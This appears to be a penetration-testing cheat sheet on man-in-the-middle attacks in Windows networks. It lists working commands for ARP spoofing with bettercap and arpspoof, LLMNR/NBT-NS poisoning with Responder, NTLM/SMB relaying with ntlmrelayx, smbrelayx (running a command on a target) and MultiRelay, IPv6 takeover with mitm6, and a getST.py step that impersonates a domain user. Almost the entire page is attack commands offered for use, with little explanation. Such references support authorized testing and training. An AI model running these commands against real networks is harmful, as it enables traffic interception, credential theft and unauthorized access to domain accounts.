Man-in-the-Middle
ARP Cache Poisoning
Bettercap2
arp.spoof onArpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1LLMNR/NBT-NS Poisoning and SMB Relay
Responder
Remember to start with
SMB = Off # Turn this off
HTTP = Off # Turn this offresponder -I eth0 -rvresponder -I eth0 -r -d -wRelay
ntlmrelayx
cme smb <CIDR> --gen-relay-list targets.txtntlmrelayx.py -tf targets.txtsmbrelayx
smbrelayx.py -h <target_IP> -c "ipconfig"MultiRelay
python MultiRelay.py -t <IP target> -u ALLmitm6
mitm6 -d example.local --ignore-nofqdnRelay
ntlmrelayx.py -6 -t ldaps://example.local --delegate-access --no-smb-server -wh test-wpadExploit
getST.py -spn cifs/example.local example.local/ADDED_PC\$ -impersonate TARGET_USERInveighZero
Works from Windows systems:
Last updated
Was this helpful?